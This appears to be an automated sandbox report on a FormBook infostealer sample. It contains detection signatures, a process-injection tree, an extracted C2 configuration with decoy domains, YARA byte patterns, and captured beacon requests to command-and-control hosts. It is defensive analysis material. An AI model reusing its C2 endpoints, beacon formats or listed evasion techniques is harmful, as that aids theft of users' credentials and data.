Windows Analysis Report
5tCYPTkM6b.exe

Overview

General Information

Sample Name: 5tCYPTkM6b.exe
Analysis ID: 562034
MD5: c2ca2ba9c38eb02217588662717ba6c3
SHA1: 8a897f24d2e564af2c2fcc272ab0cfbef10611b5
SHA256: 9af4d9ef8b2a850854ae23411d44d3603147c26898bca1010fd2f9b16f6d456e
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Self deletion via cmd delete
Injects a PE file into a foreign processes
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64
  • 5tCYPTkM6b.exe (PID: 4904 cmdline: "C:\Users\user\Desktop\5tCYPTkM6b.exe" MD5: C2CA2BA9C38EB02217588662717BA6C3)
    • 5tCYPTkM6b.exe (PID: 5880 cmdline: "C:\Users\user\Desktop\5tCYPTkM6b.exe" MD5: C2CA2BA9C38EB02217588662717BA6C3)
      • explorer.exe (PID: 3292 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • control.exe (PID: 6932 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)
          • cmd.exe (PID: 6980 cmdline: /c del "C:\Users\user\Desktop\5tCYPTkM6b.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
{"C2 list": ["www.dreamschools.online/b80i/"], "decoy": ["yixuan5.com", "jiazheng369.com", "danielleefelipe.net", "micorgas.com", "uvywah.com", "nbjcgl.com", "streets4suites.com", "hempgotas.com", "postmoon.xyz", "gaboshoes.com", "pastodwes.com", "libes.asia", "damusalama.com", "youngliving1.com", "mollyagee.com", "branchwallet.com", "seebuehnegoerlitz.com", "inventors.community", "teentykarm.quest", "927291.com", "wohn-union.info", "rvmservices.com", "cuanquotex.online", "buysubarus.com", "360e.group", "markham.condos", "carriewilliamsinc.com", "ennitec.com", "wildberryhair.com", "trulyrun.com", "pinkandgrey.info", "mnselfservice.com", "gabtomenice.com", "2thpolis.com", "standardcrypro.com", "58lif.com", "ir-hasnol.com", "ggsega.xyz", "tipslowclever.rest", "atlasgrpltdgh.com", "4338agnes.com", "hillsncreeks.com", "pentest.ink", "cevichiles.com", "evodoge.com", "gooooooo.xyz", "ehaszthecarpetbagger.com", "finanes.xyz", "zoharfine.com", "viperiastudios.com", "sjljtzsls.com", "frentags.art", "mediafyagency.com", "faydergayremezdayener.net", "freelance-rse.com", "quickmovecourierservices.com", "lexingtonprochoice.com", "farmacymerchants.com", "inkland-tattoo.com", "aloebiotics.com", "rampi6.com", "bookinggroningen.com", "wilkinsutotint.com", "inslidr.com"]}
Source | Rule | Description | Author | Strings
00000002.00000002.332468083.0000000000910000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000002.00000002.332468083.0000000000910000.00000040.10000000.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.332468083.0000000000910000.00000040.10000000.00040000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x16ae9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bfc:$sqlite3step: 68 34 1C 7B E1
    • 0x16b18:$sqlite3text: 68 38 2A 90 C5
    • 0x16c3d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000000.267961814.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000002.00000000.267961814.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source | Rule | Description | Author | Strings
0.2.5tCYPTkM6b.exe.2300000.1.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0.2.5tCYPTkM6b.exe.2300000.1.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.5tCYPTkM6b.exe.2300000.1.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x15ce9:$sqlite3step: 68 34 1C 7B E1
        • 0x15dfc:$sqlite3step: 68 34 1C 7B E1
        • 0x15d18:$sqlite3text: 68 38 2A 90 C5
        • 0x15e3d:$sqlite3text: 68 38 2A 90 C5
        • 0x15d2b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15e53:$sqlite3blob: 68 53 D8 7F 8C
2.0.5tCYPTkM6b.exe.400000.4.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
2.0.5tCYPTkM6b.exe.400000.4.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
No Sigma rule has matched

AV Detection

Source: 00000002.00000002.332468083.0000000000910000.00000040.10000000.00040000.00000000.sdmp | Malware Configuration Extractor: FormBook (configuration as listed above)
Source: 5tCYPTkM6b.exe | Virustotal: Detection: 39%
Source: 5tCYPTkM6b.exe | ReversingLabs: Detection: 34%
Source: Yara match | File source: 0.2.5tCYPTkM6b.exe.2300000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.5tCYPTkM6b.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.5tCYPTkM6b.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.5tCYPTkM6b.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.5tCYPTkM6b.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.5tCYPTkM6b.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.5tCYPTkM6b.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.5tCYPTkM6b.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.5tCYPTkM6b.exe.2300000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.332468083.0000000000910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.267961814.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.522721651.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000000.305802792.000000000F609000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.523572429.0000000000730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.332146326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.332417748.00000000008E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.523718617.0000000000760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.266985950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000000.319162171.000000000F609000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.270764951.0000000002300000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: http://www.yixuan5.com/b80i/?Tjox=uE8pNRih73IMph6TwINJhREQoM0gDuEUez/fX+GpYn7iSRYOEOY8W/QDgsCvwRU23ef9loG+cg==&3f9LV=d484gh1H9 | Avira URL Cloud: Label: malware
Source: http://www.farmacymerchants.com/b80i/?Tjox=shkkGZu5/RZ8iX9p+IXF0YMrmhwzQE3Vmi1yYN92EzxfMV+N5Q/+I95GtZw5bZfv7GwSNh0c2Q==&3f9LV=d484gh1H9 | Avira URL Cloud: Label: malware
Source: www.dreamschools.online/b80i/ | Avira URL Cloud: Label: phishing
Source: http://www.carriewilliamsinc.com/b80i/?Tjox=OPDrsYDAXYudYL2hPtHgnQqdl9DF73S6Onzi++lTY4BHymNtl4pPvZlk8Nnjb/pYfVanIAZSdg==&3f9LV=d484gh1H9 | Avira URL Cloud: Label: malware
Source: http://www.gooooooo.xyz/b80i/?Tjox=RiUiRE3mjXVt2J/JNN+P+o7W4g2/FA7pScYCkHZZbsn0kCc2XYGtZAPMcbBY0+c70SCl18kAyQ==&3f9LV=d484gh1H9 | Avira URL Cloud: Label: phishing
Source: 5tCYPTkM6b.exe | Joe Sandbox ML: detected
Source: 0.2.5tCYPTkM6b.exe.2300000.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 14.2.control.exe.486796c.4.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 2.0.5tCYPTkM6b.exe.400000.3.unpack | Avira: Label: TR/Patched.Ren.Gen2
Source: 2.0.5tCYPTkM6b.exe.400000.4.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.0.5tCYPTkM6b.exe.400000.6.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.0.5tCYPTkM6b.exe.400000.0.unpack | Avira: Label: TR/Patched.Ren.Gen2
Source: 14.2.control.exe.53aa88.0.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 2.0.5tCYPTkM6b.exe.400000.2.unpack | Avira: Label: TR/Patched.Ren.Gen2
Source: 2.0.5tCYPTkM6b.exe.400000.1.unpack | Avira: Label: TR/Patched.Ren.Gen2
Source: 2.2.5tCYPTkM6b.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.0.5tCYPTkM6b.exe.400000.5.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5tCYPTkM6b.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: wntdll.pdbUGP | source: 5tCYPTkM6b.exe, 00000000.00000003.267437661.000000001B0B0000.00000004.00000800.00020000.00000000.sdmp, 5tCYPTkM6b.exe, 00000000.00000003.264871766.000000001AF20000.00000004.00000800.00020000.00000000.sdmp, 5tCYPTkM6b.exe, 00000002.00000002.332790089.0000000000ABF000.00000040.00000800.00020000.00000000.sdmp, 5tCYPTkM6b.exe, 00000002.00000002.332546161.00000000009A0000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000E.00000003.334008082.0000000004190000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000E.00000002.524788773.000000000444F000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000E.00000002.524438150.0000000004330000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: control.pdb | source: 5tCYPTkM6b.exe, 00000002.00000002.332518293.0000000000950000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: 5tCYPTkM6b.exe, 5tCYPTkM6b.exe, 00000002.00000002.332790089.0000000000ABF000.00000040.00000800.00020000.00000000.sdmp, 5tCYPTkM6b.exe, 00000002.00000002.332546161.00000000009A0000.00000040.00000800.00020000.00000000.sdmp, control.exe, control.exe, 0000000E.00000003.334008082.0000000004190000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000E.00000002.524788773.000000000444F000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000E.00000002.524438150.0000000004330000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: control.pdbUGP | source: 5tCYPTkM6b.exe, 00000002.00000002.332518293.0000000000950000.00000040.10000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Code function: 0_2_00405D7C FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Code function: 0_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Code function: 0_2_00402630 FindFirstFileA,
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\control.exe | Code function: 4x nop then pop edi

Networking

Source: C:\Windows\explorer.exe | Domain query: www.gooooooo.xyz
Source: C:\Windows\explorer.exe | Domain query: www.carriewilliamsinc.com
Source: C:\Windows\explorer.exe | Network Connect: 148.72.244.75 80
Source: C:\Windows\explorer.exe | Domain query: www.yixuan5.com
Source: C:\Windows\explorer.exe | Domain query: www.inslidr.com
Source: C:\Windows\explorer.exe | Domain query: www.farmacymerchants.com
Source: C:\Windows\explorer.exe | Network Connect: 156.246.248.162 80
Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe | DNS query: www.gooooooo.xyz
Source: DNS query: www.postmoon.xyz
Source: Malware configuration extractor | URLs: www.dreamschools.online/b80i/
Source: Joe Sandbox View | ASN Name: AS-26496-GO-DADDY-COM-LLCUS
Source: Joe Sandbox View | ASN Name: Africa-on-Cloud-ASZA
Source: global traffic | HTTP traffic detected: GET /b80i/?Tjox=OPDrsYDAXYudYL2hPtHgnQqdl9DF73S6Onzi++lTY4BHymNtl4pPvZlk8Nnjb/pYfVanIAZSdg==&3f9LV=d484gh1H9 HTTP/1.1 | Host: www.carriewilliamsinc.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /b80i/?Tjox=RiUiRE3mjXVt2J/JNN+P+o7W4g2/FA7pScYCkHZZbsn0kCc2XYGtZAPMcbBY0+c70SCl18kAyQ==&3f9LV=d484gh1H9 HTTP/1.1 | Host: www.gooooooo.xyz | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /b80i/?Tjox=uE8pNRih73IMph6TwINJhREQoM0gDuEUez/fX+GpYn7iSRYOEOY8W/QDgsCvwRU23ef9loG+cg==&3f9LV=d484gh1H9 HTTP/1.1 | Host: www.yixuan5.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /b80i/?Tjox=shkkGZu5/RZ8iX9p+IXF0YMrmhwzQE3Vmi1yYN92EzxfMV+N5Q/+I95GtZw5bZfv7GwSNh0c2Q==&3f9LV=d484gh1H9 HTTP/1.1 | Host: www.farmacymerchants.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: openresty | Date: Fri, 28 Jan 2022 09:47:39 GMT | Content-Type: text/html | Content-Length: 275 | ETag: "61f281b6-113" | Via: 1.1 google | Connection: close | Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 28 Jan 2022 09:47:44 GMT | Server: Apache | Accept-Ranges: bytes | Cache-Control: no-cache, no-store, must-revalidate | Pragma: no-cache | Expires: 0 | Connection: close | Transfer-Encoding: chunked | Content-Type: text/html
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html | Server: Microsoft-IIS/7.5 | X-Powered-By: ASP.NET | Date: Fri, 28 Jan 2022 09:47:47 GMT | Connection: close | Content-Length: 1163
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: openresty | Date: Fri, 28 Jan 2022 09:48:06 GMT | Content-Type: text/html | Content-Length: 275 | ETag: "61f22041-113" | Via: 1.1 google | Connection: close | Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: 5tCYPTkM6b.exe | String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: 5tCYPTkM6b.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: explorer.exe, 00000004.00000000.298803762.0000000006840000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.276761296.0000000006840000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.374119582.0000000006840000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.312026121.0000000006840000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: unknown | DNS traffic detected: queries for: www.inslidr.com
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Code function: 0_2_00404F61 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

E-Banking Fraud

Source: Yara match | File source: 0.2.5tCYPTkM6b.exe.2300000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.5tCYPTkM6b.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.5tCYPTkM6b.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.5tCYPTkM6b.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.5tCYPTkM6b.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.5tCYPTkM6b.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.5tCYPTkM6b.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.5tCYPTkM6b.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.5tCYPTkM6b.exe.2300000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.332468083.0000000000910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.267961814.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.522721651.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000000.305802792.000000000F609000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.523572429.0000000000730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.332146326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.332417748.00000000008E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.523718617.0000000000760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.266985950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000000.319162171.000000000F609000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.270764951.0000000002300000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          Source: 0.2.5tCYPTkM6b.exe.2300000.1.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.5tCYPTkM6b.exe.2300000.1.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.5tCYPTkM6b.exe.400000.4.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.5tCYPTkM6b.exe.400000.4.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.5tCYPTkM6b.exe.400000.6.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.5tCYPTkM6b.exe.400000.6.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.5tCYPTkM6b.exe.400000.6.raw.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.5tCYPTkM6b.exe.400000.6.raw.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.5tCYPTkM6b.exe.400000.5.raw.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.5tCYPTkM6b.exe.400000.5.raw.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.5tCYPTkM6b.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.5tCYPTkM6b.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.5tCYPTkM6b.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.5tCYPTkM6b.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.5tCYPTkM6b.exe.400000.5.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.5tCYPTkM6b.exe.400000.5.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.5tCYPTkM6b.exe.2300000.1.raw.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.5tCYPTkM6b.exe.2300000.1.raw.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.332468083.0000000000910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.332468083.0000000000910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.267961814.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.267961814.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.522721651.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.522721651.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.305802792.000000000F609000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.305802792.000000000F609000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.523572429.0000000000730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
